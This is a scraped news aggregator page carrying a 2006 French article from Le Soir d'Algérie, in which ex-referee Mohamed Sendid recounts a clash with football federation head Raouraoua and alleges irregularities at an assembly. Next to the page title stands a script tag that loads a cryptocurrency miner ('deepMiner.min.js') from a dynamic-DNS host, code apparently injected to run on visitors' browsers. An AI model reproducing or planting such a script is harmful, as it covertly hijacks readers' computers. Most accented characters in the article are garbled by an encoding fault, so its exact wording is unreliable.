googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Sendid raconte son �aventure� avec Raouraoua<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Sendid raconte son �aventure� avec Raouraoua
Publié dans Le Soir d'Algérie le 25 - 01 - 2006

L�altercation entre Mohamed Sendid (ex-arbitre FIFA, ex-pr�sident Lofa, ex-membre CNES, ex-manager d�entreprise et ex-UGTA) et Mohamed Raouraoua, (Pdt sortant de la FAF, membre FIFA, CAF et UAFA) est due au fait que le nouveau pr�sident du Task-Force FIFA avait outrepass� ses droits.
En effet, nous avons rencontr� Sendid pour en savoir plus de ce f�cheux incident qui d�montre le mauvais �tat d�esprit des gestionnaires qui ont failli � leur t�che, s�en prenant � ceux qui veulent apporter un plus au sport roi d�voy�. �J��tais venu accompagner mes amis Brik et Bendadache, membres de l�AG et non pas pour entrer dans la salle, je connais mes droits et devoirs�. Comment se fait-il qu�un pr�sident de la FAF ne puisse pas reconna�tre un arbitre international et de surcro�t, un membre de la DTNA (conf�rencier et examinateur d�arbitres saison 2004/2006). Ce n�est que lorsque je lui ai exhib� ma carte �d�arbitre FIFA� et montr� la signature de Blatter qu�il a pr�sent� ses excuses, que j�ai refus�es sur-le-champ�. Il s�agit d�impolitesse flagrante d�une personne imbue de son statut qui pense que tous doivent se plier sur son passage�, dira Mohamed Sendid. En pr�sence de Larbi Brik et Abdelkader Bendadache, membres de la coordination nationale de la refonte du football, il a �t� constat� des irr�gularit�s dans le d�roulement de cette AGE. Ainsi, Ma�tre Brik, juriste de profession dira : �Comment se fait-il que les statuts soient encore bafou�s ? En effet, la liste des membres de Hamid Haddadj ne comportait que neuf noms au lieu de dix, car le Dr Boussalah Abdenasser avait vu (lettre re�ue � la FAF) sa qualit� de repr�sentant du WAT remise en cause par Abdelkrim Yahla, le pr�sident du WAT lequel, lui-m�me, a �t� interdit d�entrer. Se r�f�rant au code civil alg�rien o� un mandant (P-dt-WAT) peut retirer � tout moment la qualit� de mandataire (Dr Boussalah) c��tait Yahla (ex-officier sup�rieur de l�ANP) � repr�senter r�guli�rement son club (WAT). En outre, comment se fait-il que Guidouche Sa�d et Bendaoud Ahmed, concern�s par le fameux article 47, car ayant fait partie du bureau f�d�ral que je pr�sidais apr�s le d�c�s de feu Rachid Harra�gue, aient �t� autoris�s � faire partie de la liste de Haddadj. Normalement, le candidat Chabane aurait d� demander l�annulation de cette AGE pour deux raisons statutaires : 1) La prise de position manifeste (lettres adress�es aux ligues que certains quotidiens ont scann�es dans leurs �ditions) de Raouraoua en tant qu�ex-pr�sident sortant qui ne devait pas �objectivement et dignement� pr�sider et laisser le plus ancien membre de l�AG ou le plus �g� de cette auguste AG mener la s�ance. 2) La liste pr�sent�e comportait neuf personnes au lieu de dix noms conform�ment aux statuts. Tout cela pour dire que cet empressement ne fera pas revenir une embellie du football, le sport le plus populaire du pays�. Sendid, apr�s une explication amicale sur les tenants et les erreurs commises lors de cette AGE, avec Abdelmadjid Yahia � la fin de l�AGE, a dit : �Voil� comment on doit r�agir avec la violence des Aur�s et l�intelligence de l�Ouest. Pourtant, beaucoup de personnalit�s de cette r�gion sont marginalis�es et seules leurs voix sont convoit�es et les bienvenues. Bonne chance tout de m�me au pr�sident Haddadj qui doit redorer le blason terni de notre sport roi�, a-t-il conclu.

Cliquez ici pour lire l'article depuis sa source.